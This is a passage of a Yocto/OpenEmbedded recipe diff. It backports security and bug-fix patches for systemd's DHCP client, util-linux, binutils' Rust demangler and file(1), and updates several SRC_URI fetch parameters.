+- int r, notify_event = 0;
++ int r, notify_event;
+
+ assert(client);
+ assert(client->event);
+@@ -1815,16 +1815,16 @@ static int client_handle_message(sd_dhcp_client *client, DHCPMessage *message, i
+ if (r < 0)
+ goto error;
+
++ if (IN_SET(client->state, DHCP_STATE_REQUESTING, DHCP_STATE_REBOOTING))
++ notify_event = SD_DHCP_CLIENT_EVENT_IP_ACQUIRE;
++ else
++ notify_event = r;
++
+ client->start_delay = 0;
+ (void) event_source_disable(client->timeout_resend);
+ client->receive_message = sd_event_source_unref(client->receive_message);
+ client->fd = safe_close(client->fd);
+
+- if (IN_SET(client->state, DHCP_STATE_REQUESTING, DHCP_STATE_REBOOTING))
+- notify_event = SD_DHCP_CLIENT_EVENT_IP_ACQUIRE;
+- else if (r != SD_DHCP_CLIENT_EVENT_IP_ACQUIRE)
+- notify_event = r;
+-
+ client->state = DHCP_STATE_BOUND;
+ client->attempt = 0;
+
+@@ -1846,12 +1846,13 @@ static int client_handle_message(sd_dhcp_client *client, DHCPMessage *message, i
+
+ client_initialize_io_events(client, client_receive_message_udp);
+
+- if (notify_event) {
++ if (IN_SET(client->state, DHCP_STATE_RENEWING, DHCP_STATE_REBINDING) &&
++ notify_event == SD_DHCP_CLIENT_EVENT_IP_ACQUIRE)
++ /* FIXME: hmm, maybe this is a bug... */
++ log_dhcp_client(client, "client_handle_ack() returned SD_DHCP_CLIENT_EVENT_IP_ACQUIRE while DHCP client is %s the address, skipping callback.",
++ client->state == DHCP_STATE_RENEWING ? "renewing" : "rebinding");
++ else
+ client_notify(client, notify_event);
+- if (client->state == DHCP_STATE_STOPPED)
+- return 0;
+- }
+-
+ break;
+
+ case DHCP_STATE_BOUND:
diff --git a/meta/recipes-core/systemd/systemd/0004-sd-dhcp-client-tentatively-ignore-FORCERENEW-command.patch b/meta/recipes-core/systemd/systemd/0004-sd-dhcp-client-tentatively-ignore-FORCERENEW-command.patch
new file mode 100644
index 00000000000..c65fb45ab9c
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/0004-sd-dhcp-client-tentatively-ignore-FORCERENEW-command.patch
@@ -0,0 +1,42 @@
+From ae18277a6cfd04af8a914780f04a867254ab2341 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Thu, 24 Jun 2021 01:22:07 +0900
+Subject: [PATCH] sd-dhcp-client: tentatively ignore FORCERENEW command
+
+This makes DHCP client ignore FORCERENEW requests, as unauthenticated
+FORCERENEW requests causes a security issue (TALOS-2020-1142, CVE-2020-13529).
+
+Let's re-enable this after RFC3118 (Authentication for DHCP Messages)
+and/or RFC6704 (Forcerenew Nonce Authentication) are implemented.
+
+Fixes #16774.
+
+Upstream-Status: Backport
+CVE: CVE-2020-13529
+Signed-off-by: Chen Qi <Qi.Chen@windriver.com>
+---
+ src/libsystemd-network/sd-dhcp-client.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/src/libsystemd-network/sd-dhcp-client.c b/src/libsystemd-network/sd-dhcp-client.c
+index 04a75c6966..54eb3a2ab0 100644
+--- a/src/libsystemd-network/sd-dhcp-client.c
++++ b/src/libsystemd-network/sd-dhcp-client.c
+@@ -1536,9 +1536,17 @@ static int client_handle_forcerenew(sd_dhcp_client *client, DHCPMessage *force,
+ if (r != DHCP_FORCERENEW)
+ return -ENOMSG;
+
++#if 0
+ log_dhcp_client(client, "FORCERENEW");
+
+ return 0;
++#else
++ /* FIXME: Ignore FORCERENEW requests until we implement RFC3118 (Authentication for DHCP
++ * Messages) and/or RFC6704 (Forcerenew Nonce Authentication), as unauthenticated FORCERENEW
++ * requests causes a security issue (TALOS-2020-1142, CVE-2020-13529). */
++ log_dhcp_client(client, "Received FORCERENEW, ignoring.");
++ return -ENOMSG;
++#endif
+ }
+
+ static bool lease_equal(const sd_dhcp_lease *a, const sd_dhcp_lease *b) {
diff --git a/meta/recipes-core/systemd/systemd_247.6.bb b/meta/recipes-core/systemd/systemd_247.6.bb
index 32afa159ec3..e79c79a7fd9 100644
--- a/meta/recipes-core/systemd/systemd_247.6.bb
+++ b/meta/recipes-core/systemd/systemd_247.6.bb
@@ -27,6 +27,11 @@ SRC_URI += "file://touchscreen.rules \
file://0001-logind-Restore-chvt-as-non-root-user-without-polkit.patch \
file://0027-proc-dont-trigger-mount-error-with-invalid-options-o.patch \
file://0001-analyze-resolve-executable-path-if-it-is-relative.patch \
+ file://0001-sd-dhcp-client-check-error-earlier-and-reduce-indent.patch \
+ file://0002-sd-dhcp-client-shorten-code-a-bit.patch \
+ file://0003-sd-dhcp-client-logs-when-dhcp-client-unexpectedly-ga.patch \
+ file://0004-sd-dhcp-client-tentatively-ignore-FORCERENEW-command.patch \
+ file://0001-basic-unit-name-do-not-use-strdupa-on-a-path.patch \
"
# patches needed by musl
diff --git a/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb b/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
index 75632d94347..daee5c224b4 100644
--- a/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
+++ b/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
@@ -6,8 +6,8 @@ SECTION = "base"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://update-rc.d;beginline=5;endline=15;md5=d40a07c27f535425934bb5001f2037d9"
-SRC_URI = "git://git.yoctoproject.org/update-rc.d"
-SRCREV = "4b150b25b38de688d25cde2b2d22c268ed65a748"
+SRC_URI = "git://git.yoctoproject.org/update-rc.d;branch=master"
+SRCREV = "8636cf478d426b568c1be11dbd9346f67e03adac"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-core/util-linux/util-linux.inc b/meta/recipes-core/util-linux/util-linux.inc
index 6b47f417aad..b21d6d46d20 100644
--- a/meta/recipes-core/util-linux/util-linux.inc
+++ b/meta/recipes-core/util-linux/util-linux.inc
@@ -36,5 +36,6 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/utils/util-linux/v${MAJOR_VERSION}/util-lin
file://display_testname_for_subtest.patch \
file://avoid_parallel_tests.patch \
file://Automake-use-EXTRA_LTLIBRARIES-instead-of-noinst_LTL.patch \
+ file://CVE-2021-37600.patch \
"
SRC_URI[sha256sum] = "f7516ba9d8689343594356f0e5e1a5f0da34adfbc89023437735872bb5024c5f"
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch
new file mode 100644
index 00000000000..11934eee8d6
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch
@@ -0,0 +1,38 @@
+From 1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Tue, 27 Jul 2021 11:58:31 +0200
+Subject: [PATCH] sys-utils/ipcutils: be careful when call calloc() for uint64
+ nmembs
+
+Fix: https://github.com/karelzak/util-linux/issues/1395
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+CVE: CVE-2021-37600
+
+after version 2.37.1
+https://github.com/karelzak/util-linux.git 1c9143d0c1d...
+unmodified
+
+Upstream-Status: Backport
+
+Signed-off-by: Joe Slater <joe.slater@windriver.com>
+---
+ sys-utils/ipcutils.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/sys-utils/ipcutils.c b/sys-utils/ipcutils.c
+index e784c4d..18868cf 100644
+--- a/sys-utils/ipcutils.c
++++ b/sys-utils/ipcutils.c
+@@ -218,7 +218,7 @@ static void get_sem_elements(struct sem_data *p)
+ {
+ size_t i;
+
+- if (!p || !p->sem_nsems || p->sem_perm.id < 0)
++ if (!p || !p->sem_nsems || p->sem_nsems > SIZE_MAX || p->sem_perm.id < 0)
+ return;
+
+ p->elements = xcalloc(p->sem_nsems, sizeof(struct sem_elem));
+--
+2.7.4
+
diff --git a/meta/recipes-core/util-linux/util-linux_2.36.2.bb b/meta/recipes-core/util-linux/util-linux_2.36.2.bb
index c79cf782d15..82cc8a3dbf8 100644
--- a/meta/recipes-core/util-linux/util-linux_2.36.2.bb
+++ b/meta/recipes-core/util-linux/util-linux_2.36.2.bb
@@ -73,7 +73,7 @@ EXTRA_OECONF = "\
\
--disable-bfs --disable-chfn-chsh --disable-login \
--disable-makeinstall-chown --disable-minix --disable-newgrp \
- --disable-use-tty-group --disable-vipw \
+ --disable-use-tty-group --disable-vipw --disable-raw \
\
--without-udev \
\
diff --git a/meta/recipes-devtools/binutils/binutils-2.36.inc b/meta/recipes-devtools/binutils/binutils-2.36.inc
index 9d770db5a82..7d0824e060d 100644
--- a/meta/recipes-devtools/binutils/binutils-2.36.inc
+++ b/meta/recipes-devtools/binutils/binutils-2.36.inc
@@ -44,5 +44,7 @@ SRC_URI = "\
file://0001-CVE-2021-20197.patch \
file://0002-CVE-2021-20197.patch \
file://0003-CVE-2021-20197.patch \
+ file://0017-CVE-2021-3530.patch \
+ file://0018-CVE-2021-3530.patch \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/binutils/binutils/0017-CVE-2021-3530.patch b/meta/recipes-devtools/binutils/binutils/0017-CVE-2021-3530.patch
new file mode 100644
index 00000000000..fa10a6c99aa
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/0017-CVE-2021-3530.patch
@@ -0,0 +1,102 @@
+From 25162c795b1a2becf936bb3581d86a307ea491eb Mon Sep 17 00:00:00 2001
+From: Nick Clifton <nickc@redhat.com>
+Date: Thu, 15 Jul 2021 16:51:56 +0100
+Subject: [PATCH] Fix a stack exhaustion problem in the Rust demangling code in
+ the libiberty library.
+
+ PR 99935
+ * rust-demangle.c: Add recursion limit.
+
+CVE: CVE-2021-3530
+Upstream-Status: Backport[https://sourceware.org/git/?p=binutils-gdb.git;a=commit;h=25162c795b1a2becf936bb3581d86a307ea491eb]
+Signed-off-by: Pgowda <pgowda.cve@gmail.com>
+
+---
+ libiberty/ChangeLog | 5 +++++
+ libiberty/rust-demangle.c | 31 +++++++++++++++++++++++++------
+ 2 files changed, 30 insertions(+), 6 deletions(-)
+
+diff --git a/libiberty/ChangeLog b/libiberty/ChangeLog
+index bc1b35b97c4..8e39fd28eba 100644
+--- a/libiberty/ChangeLog
++++ b/libiberty/ChangeLog
+@@ -1,3 +1,8 @@
++2021-07-15 Nick Clifton <nickc@redhat.com>
++
++ PR 99935
++ * rust-demangle.c: Add recursion limit.
++
+ 2021-01-04 Martin Liska <mliska@suse.cz>
+
+ * strverscmp.c: Convert to utf8 from iso8859.
+diff --git a/libiberty/rust-demangle.c b/libiberty/rust-demangle.c
+index 449941b56dc..df09b7b8fdd 100644
+--- a/libiberty/rust-demangle.c
++++ b/libiberty/rust-demangle.c
+@@ -74,6 +74,12 @@ struct rust_demangler
+ /* Rust mangling version, with legacy mangling being -1. */
+ int version;
+
++ /* Recursion depth. */
++ uint recursion;
++ /* Maximum number of times demangle_path may be called recursively. */
++#define RUST_MAX_RECURSION_COUNT 1024
++#define RUST_NO_RECURSION_LIMIT ((uint) -1)
++
+ uint64_t bound_lifetime_depth;
+ };
+
+@@ -671,6 +677,15 @@ demangle_path (struct rust_demangler *rd
+ if (rdm->errored)
+ return;
+
++ if (rdm->recursion != RUST_NO_RECURSION_LIMIT)
++ {
++ ++ rdm->recursion;
++ if (rdm->recursion > RUST_MAX_RECURSION_COUNT)
++ /* FIXME: There ought to be a way to report
++ that the recursion limit has been reached. */
++ goto fail_return;
++ }
++
+ switch (tag = next (rdm))
+ {
+ case 'C':
+@@ -688,10 +703,7 @@ demangle_path (struct rust_demangler *rd
+ case 'N':
+ ns = next (rdm);
+ if (!ISLOWER (ns) && !ISUPPER (ns))
+- {
+- rdm->errored = 1;
+- return;
+- }
++ goto fail_return;
+
+ demangle_path (rdm, in_value);
+
+@@ -776,9 +788,15 @@ demangle_path (struct rust_demangler *rd
+ }
+ break;
+ default:
+- rdm->errored = 1;
+- return;
++ goto fail_return;
+ }
++ goto pass_return;
++
++ fail_return:
++ rdm->errored = 1;
++ pass_return:
++ if (rdm->recursion != RUST_NO_RECURSION_LIMIT)
++ -- rdm->recursion;
+ }
+
+ static void
+@@ -1317,6 +1335,7 @@ rust_demangle_callback (const char *mang
+ rdm.skipping_printing = 0;
+ rdm.verbose = (options & DMGL_VERBOSE) != 0;
+ rdm.version = 0;
++ rdm.recursion = (options & DMGL_NO_RECURSE_LIMIT) ? RUST_NO_RECURSION_LIMIT : 0;
+ rdm.bound_lifetime_depth = 0;
+
+ /* Rust symbols always start with _R (v0) or _ZN (legacy). */
diff --git a/meta/recipes-devtools/binutils/binutils/0018-CVE-2021-3530.patch b/meta/recipes-devtools/binutils/binutils/0018-CVE-2021-3530.patch
new file mode 100644
index 00000000000..e569a6bc47c
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/0018-CVE-2021-3530.patch
@@ -0,0 +1,64 @@
+From 999566402e3d7c69032bbf47e28b44fc0926fe62 Mon Sep 17 00:00:00 2001
+From: Christopher Wellons <wellons@nullprogram.com>
+Date: Sun, 18 Jul 2021 16:57:19 -0400
+Subject: [PATCH] Change "uint" to "unsigned"
+
+This fixes a defect introduced in 25162c795. The "uint" type has not
+been explicitly defined here on mingw, causing compilation to fail.
+
+On linux we have this in /usr/include/sys/types.h
+
+/* Old compatibility names for C types. */
+typedef unsigned long int ulong;
+typedef unsigned short int ushort;
+typedef unsigned int uint;
+
+So it's easy to see how such bugs can creep in.
+
+ * rust-demangle.c (struct rust_demangler): Change type of
+ "recursion" to unsigned.
+ (RUST_NO_RECURSION_LIMIT): Similarly in cast.
+
+CVE: CVE-2021-3530
+Upstream-Status: Backport[https://sourceware.org/git/?p=binutils-gdb.git;a=commit;h=999566402e3]
+Signed-off-by: Pgowda <pgowda.cve@gmail.com>
+
+---
+ libiberty/ChangeLog | 6 ++++++
+ libiberty/rust-demangle.c | 4 ++--
+ 2 files changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/libiberty/ChangeLog b/libiberty/ChangeLog
+index 8e39fd28eba..3f749455f05 100644
+--- a/libiberty/ChangeLog
++++ b/libiberty/ChangeLog
+@@ -1,3 +1,9 @@
++2021-07-19 Christopher Wellons <wellons@nullprogram.com>
++
++ * rust-demangle.c (struct rust_demangler): Change type of
++ "recursion" to unsigned.
++ (RUST_NO_RECURSION_LIMIT): Similarly in cast.
++
+ 2021-07-15 Nick Clifton <nickc@redhat.com>
+
+ PR 99935
+diff --git a/libiberty/rust-demangle.c b/libiberty/rust-demangle.c
+index df09b7b8fdd..ac1eb8eb02c 100644
+--- a/libiberty/rust-demangle.c
++++ b/libiberty/rust-demangle.c
+@@ -75,10 +75,10 @@ struct rust_demangler
+ int version;
+
+ /* Recursion depth. */
+- uint recursion;
++ unsigned recursion;
+ /* Maximum number of times demangle_path may be called recursively. */
+ #define RUST_MAX_RECURSION_COUNT 1024
+-#define RUST_NO_RECURSION_LIMIT ((uint) -1)
++#define RUST_NO_RECURSION_LIMIT ((unsigned) -1)
+
+ uint64_t bound_lifetime_depth;
+ };
+--
+2.27.0
+
diff --git a/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb b/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
index f6a77b46060..02a286c3965 100644
--- a/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
+++ b/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
@@ -90,7 +90,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=44ac4678311254db62edf8fd39cb8124"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+(\.\d+)*)"
-SRC_URI = "git://github.com/xrmx/bootchart.git \
+SRC_URI = "git://github.com/xrmx/bootchart.git;branch=master;protocol=https \
file://bootchartd_stop.sh \
file://0001-collector-Allocate-space-on-heap-for-chunks.patch \
file://0001-bootchart2-support-usrmerge.patch \
@@ -99,6 +99,10 @@ SRC_URI = "git://github.com/xrmx/bootchart.git \
S = "${WORKDIR}/git"
SRCREV = "868a2afab9da34f32c007d773b77253c93104636"
+# remove at next version upgrade or when output changes
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
+
inherit systemd update-rc.d python3native update-alternatives
ALTERNATIVE_${PN} = "bootchartd"
@@ -131,7 +135,7 @@ do_install () {
export PKGLIBDIR="${base_libdir}/bootchart"
export SYSTEMD_UNIT_DIR="${systemd_unitdir}/system"
- oe_runmake install
+ oe_runmake install NO_PYTHON_COMPILE=1
install -d ${D}${sysconfdir}/init.d
install -m 0755 ${WORKDIR}/bootchartd_stop.sh ${D}${sysconfdir}/init.d
diff --git a/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.10.1.bb b/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.10.1.bb
index fca010d4ae4..7f51c799cdf 100644
--- a/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.10.1.bb
+++ b/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.10.1.bb
@@ -15,7 +15,7 @@ DEPENDS_append_class-target = " udev"
RDEPENDS_${PN} = "libgcc"
SRCREV = "f2ffce38b9c1477a7350bfe165f0e34b9bde40f5"
-SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git \
+SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git;branch=master \
file://0001-Add-a-possibility-to-specify-where-python-modules-ar.patch \
"
diff --git a/meta/recipes-devtools/createrepo-c/createrepo-c_0.17.0.bb b/meta/recipes-devtools/createrepo-c/createrepo-c_0.17.0.bb
index e0433806b29..29f3866079f 100644
--- a/meta/recipes-devtools/createrepo-c/createrepo-c_0.17.0.bb
+++ b/meta/recipes-devtools/createrepo-c/createrepo-c_0.17.0.bb
@@ -4,7 +4,7 @@ HOMEPAGE = "https://github.com/rpm-software-management/createrepo_c/wiki"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "git://github.com/rpm-software-management/createrepo_c \
+SRC_URI = "git://github.com/rpm-software-management/createrepo_c;branch=master;protocol=https \
file://0001-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \
"
@@ -33,8 +33,8 @@ do_install_append_class-native() {
do_install_append_class-nativesdk() {
create_wrapper ${D}/${bindir}/createrepo_c \
RPM_CONFIGDIR=${SDKPATHNATIVE}${libdir_nativesdk}/rpm \
- MAGIC=${SDKPATHNATIVE}${datadir}/misc/magic.mgc
+ MAGIC=${datadir}/misc/magic.mgc
create_wrapper ${D}/${bindir}/modifyrepo_c \
- MAGIC=${SDKPATHNATIVE}${datadir}/misc/magic.mgc
+ MAGIC=${datadir}/misc/magic.mgc
rm -rf ${D}/etc
}
diff --git a/meta/recipes-devtools/distcc/distcc_3.3.5.bb b/meta/recipes-devtools/distcc/distcc_3.3.5.bb
index 5c2644199e1..defea99c957 100644
--- a/meta/recipes-devtools/distcc/distcc_3.3.5.bb
+++ b/meta/recipes-devtools/distcc/distcc_3.3.5.bb
@@ -15,7 +15,7 @@ PACKAGECONFIG[popt] = "--without-included-popt,--with-included-popt,popt"
RRECOMMENDS_${PN}-server = "avahi-daemon"
-SRC_URI = "git://github.com/distcc/distcc.git \
+SRC_URI = "git://github.com/distcc/distcc.git;branch=master;protocol=https \
file://default \
file://distcc \
file://distcc.service \
diff --git a/meta/recipes-devtools/dnf/dnf_4.6.0.bb b/meta/recipes-devtools/dnf/dnf_4.6.0.bb
index 6651e64352f..f2cb6db89b9 100644
--- a/meta/recipes-devtools/dnf/dnf_4.6.0.bb
+++ b/meta/recipes-devtools/dnf/dnf_4.6.0.bb
@@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
file://PACKAGE-LICENSING;md5=4a0548e303dbc77f067335b4d688e745 \
"
-SRC_URI = "git://github.com/rpm-software-management/dnf.git \
+SRC_URI = "git://github.com/rpm-software-management/dnf.git;branch=master;protocol=https \
file://0001-Corretly-install-tmpfiles.d-configuration.patch \
file://0001-Do-not-hardcode-etc-and-systemd-unit-directories.patch \
file://0005-Do-not-prepend-installroot-to-logdir.patch \
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc b/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
index 2f113c5e8d5..fb02b2006ef 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
@@ -19,7 +19,7 @@ LIC_FILES_CHKSUM = "file://NOTICE;md5=d50be0580c0b0a7fbc7a4830bbe6c12b \
SECTION = "base"
DEPENDS = "util-linux attr autoconf-archive"
-SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git"
+SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git;branch=master"
S = "${WORKDIR}/git"
inherit autotools gettext texinfo pkgconfig multilib_header update-alternatives ptest
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch
new file mode 100644
index 00000000000..caeb560d322
--- /dev/null
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch
@@ -0,0 +1,22 @@
+Ensure "small" file systems also have the default inode size (256 bytes) so that
+can store 64-bit timestamps and work past 2038.
+
+The "small" type is any size >3MB and <512MB, which covers a lot of relatively
+small filesystems built by OE, especially when they're sized to fit the contents
+and expand to the storage on boot.
+
+Upstream-Status: Inappropriate
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+diff --git a/misc/mke2fs.conf.in b/misc/mke2fs.conf.in
+index 01e35cf8..29f41dc0 100644
+--- a/misc/mke2fs.conf.in
++++ b/misc/mke2fs.conf.in
+@@ -16,7 +16,6 @@
+ }
+ small = {
+ blocksize = 1024
+- inode_size = 128
+ inode_ratio = 4096
+ }
+ floppy = {
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.46.1.bb b/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.46.1.bb
index be8b67c35d0..ddc9bfec904 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.46.1.bb
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.46.1.bb
@@ -8,6 +8,7 @@ SRC_URI += "file://remove.ldconfig.call.patch \
SRC_URI_append_class-native = " file://e2fsprogs-fix-missing-check-for-permission-denied.patch \
file://quiet-debugfs.patch \
+ file://big-inodes-for-small-fs.patch \
"
diff --git a/meta/recipes-devtools/file/file_5.39.bb b/meta/recipes-devtools/file/file_5.39.bb
index abaa8149a31..234440e4936 100644
--- a/meta/recipes-devtools/file/file_5.39.bb
+++ b/meta/recipes-devtools/file/file_5.39.bb
@@ -11,8 +11,9 @@ LIC_FILES_CHKSUM = "file://COPYING;beginline=2;md5=0251eaec1188b20d9a72c502ecfdd
DEPENDS = "file-replacement-native"
DEPENDS_class-native = "bzip2-replacement-native"
-SRC_URI = "git://github.com/file/file.git \
- file://0001-src-compress.c-correct-header-define-for-xz-lzma.patch"
+SRC_URI = "git://github.com/file/file.git;branch=master;protocol=https \
+ file://0001-src-compress.c-correct-header-define-for-xz-lzma.patch \
+ file://0001-Fix-close_on_exec-multithreaded-decompression-issue.patch"
SRCREV = "87731415de945660b00f02207d8e9d986ef9b82e"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/file/files/0001-Fix-close_on_exec-multithreaded-decompression-issue.patch b/meta/recipes-devtools/file/files/0001-Fix-close_on_exec-multithreaded-decompression-issue.patch
new file mode 100644
index 00000000000..42105feed9a
--- /dev/null
+++ b/meta/recipes-devtools/file/files/0001-Fix-close_on_exec-multithreaded-decompression-issue.patch
@@ -0,0 +1,220 @@
+From 0d82f2f3ba4a856504f23a9db1dd5f37bd076337 Mon Sep 17 00:00:00 2001
+From: Changqing Li <changqing.li@windriver.com>
+Date: Mon, 23 Aug 2021 14:16:53 +0800
+Subject: [PATCH] Fix close_on_exec multithreaded decompression issue.
+
+Upstream-Status: Backport [https://github.com/file/file/commit/81f15c2b0d6e9eaf524ff7bab37426c21af75fb7]
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ ChangeLog | 5 +++++
+ configure.ac | 2 +-
+ src/compress.c | 25 ++++++++++++++++++++++---
+ src/file.h | 12 +++++++++++-
+ src/funcs.c | 24 +++++++++++++++++++++++-
+ src/magic.c | 7 +++++--
+ 6 files changed, 67 insertions(+), 8 deletions(-)
+
+diff --git a/ChangeLog b/ChangeLog
+index f877ad22..8c4a43d4 100644
+--- a/ChangeLog
++++ b/ChangeLog
+@@ -1,3 +1,8 @@
++2020-12-08 16:24 Christos Zoulas <christos@zoulas.com>
++
++ * fix multithreaded decompression file descriptor issue
++ by using close-on-exec (Denys Vlasenko)
++
+ 2020-06-14 20:02 Christos Zoulas <christos@zoulas.com>
+
+ * release 5.39
+diff --git a/configure.ac b/configure.ac
+index 64c9f42e..521dc12d 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -166,7 +166,7 @@ else
+ fi])
+
+ dnl Checks for functions
+-AC_CHECK_FUNCS(strndup mkstemp mkostemp utimes utime wcwidth strtof newlocale uselocale freelocale memmem)
++AC_CHECK_FUNCS(strndup mkstemp mkostemp utimes utime wcwidth strtof newlocale uselocale freelocale memmem pipe2)
+
+ dnl Provide implementation of some required functions if necessary
+ AC_REPLACE_FUNCS(getopt_long asprintf vasprintf strlcpy strlcat getline ctime_r asctime_r localtime_r gmtime_r pread strcasestr fmtcheck dprintf)
+diff --git a/src/compress.c b/src/compress.c
+index 9670b72c..9f65e4fa 100644
+--- a/src/compress.c
++++ b/src/compress.c
+@@ -35,7 +35,7 @@
+ #include "file.h"
+
+ #ifndef lint
+-FILE_RCSID("@(#)$File: compress.c,v 1.127 2020/05/31 00:11:06 christos Exp $")
++FILE_RCSID("@(#)$File: compress.c,v 1.129 2020/12/08 21:26:00 christos Exp $")
+ #endif
+
+ #include "magic.h"
+@@ -844,8 +844,23 @@ uncompressbuf(int fd, size_t bytes_max, size_t method, const unsigned char *old,
+ for (i = 0; i < __arraycount(fdp); i++)
+ fdp[i][0] = fdp[i][1] = -1;
+
+- if ((fd == -1 && pipe(fdp[STDIN_FILENO]) == -1) ||
+- pipe(fdp[STDOUT_FILENO]) == -1 || pipe(fdp[STDERR_FILENO]) == -1) {
++ /*
++ * There are multithreaded users who run magic_file()
++ * from dozens of threads. If two parallel magic_file() calls
++ * analyze two large compressed files, both will spawn
++ * an uncompressing child here, which writes out uncompressed data.
++ * We read some portion, then close the pipe, then waitpid() the child.
++ * If uncompressed data is larger, child shound get EPIPE and exit.
++ * However, with *parallel* calls OTHER child may unintentionally
++ * inherit pipe fds, thus keeping pipe open and making writes in
++ * our child block instead of failing with EPIPE!
++ * (For the bug to occur, two threads must mutually inherit their pipes,
++ * and both must have large outputs. Thus it happens not that often).
++ * To avoid this, be sure to create pipes with O_CLOEXEC.
++ */
++ if ((fd == -1 && file_pipe_closexec(fdp[STDIN_FILENO]) == -1) ||
++ file_pipe_closexec(fdp[STDOUT_FILENO]) == -1 ||
++ file_pipe_closexec(fdp[STDERR_FILENO]) == -1) {
+ closep(fdp[STDIN_FILENO]);
+ closep(fdp[STDOUT_FILENO]);
+ return makeerror(newch, n, "Cannot create pipe, %s",
+@@ -876,16 +891,20 @@ uncompressbuf(int fd, size_t bytes_max, size_t method, const unsigned char *old,
+ if (fdp[STDIN_FILENO][1] > 2)
+ (void) close(fdp[STDIN_FILENO][1]);
+ }
++ file_clear_closexec(STDIN_FILENO);
++
+ ///FIXME: if one of the fdp[i][j] is 0 or 1, this can bomb spectacularly
+ if (copydesc(STDOUT_FILENO, fdp[STDOUT_FILENO][1]))
+ (void) close(fdp[STDOUT_FILENO][1]);
+ if (fdp[STDOUT_FILENO][0] > 2)
+ (void) close(fdp[STDOUT_FILENO][0]);
++ file_clear_closexec(STDOUT_FILENO);
+
+ if (copydesc(STDERR_FILENO, fdp[STDERR_FILENO][1]))
+ (void) close(fdp[STDERR_FILENO][1]);
+ if (fdp[STDERR_FILENO][0] > 2)
+ (void) close(fdp[STDERR_FILENO][0]);
++ file_clear_closexec(STDERR_FILENO);
+
+ (void)execvp(compr[method].argv[0],
+ RCAST(char *const *, RCAST(intptr_t, compr[method].argv)));
+diff --git a/src/file.h b/src/file.h
+index 28ebc0c1..48f4b698 100644
+--- a/src/file.h
++++ b/src/file.h
+@@ -27,7 +27,7 @@
+ */
+ /*
+ * file.h - definitions for file(1) program
+- * @(#)$File: file.h,v 1.220 2020/06/08 17:38:27 christos Exp $
++ * @(#)$File: file.h,v 1.223 2020/12/08 21:26:00 christos Exp $
+ */
+
+ #ifndef __file_h__
+@@ -143,6 +143,14 @@
+ #define MAX(a,b) (((a) > (b)) ? (a) : (b))
+ #endif
+
++#ifndef O_CLOEXEC
++# define O_CLOEXEC 0
++#endif
++
++#ifndef FD_CLOEXEC
++# define FD_CLOEXEC 1
++#endif
++
+ #define FILE_BADSIZE CAST(size_t, ~0ul)
+ #define MAXDESC 64 /* max len of text description/MIME type */
+ #define MAXMIME 80 /* max len of text MIME type */
+@@ -538,6 +546,8 @@ protected char * file_printable(char *, size_t, const char *, size_t);
+ protected int file_os2_apptype(struct magic_set *, const char *, const void *,
+ size_t);
+ #endif /* __EMX__ */
++protected int file_pipe_closexec(int *);
++protected int file_clear_closexec(int);
+
+ protected void buffer_init(struct buffer *, int, const struct stat *,
+ const void *, size_t);
+diff --git a/src/funcs.c b/src/funcs.c
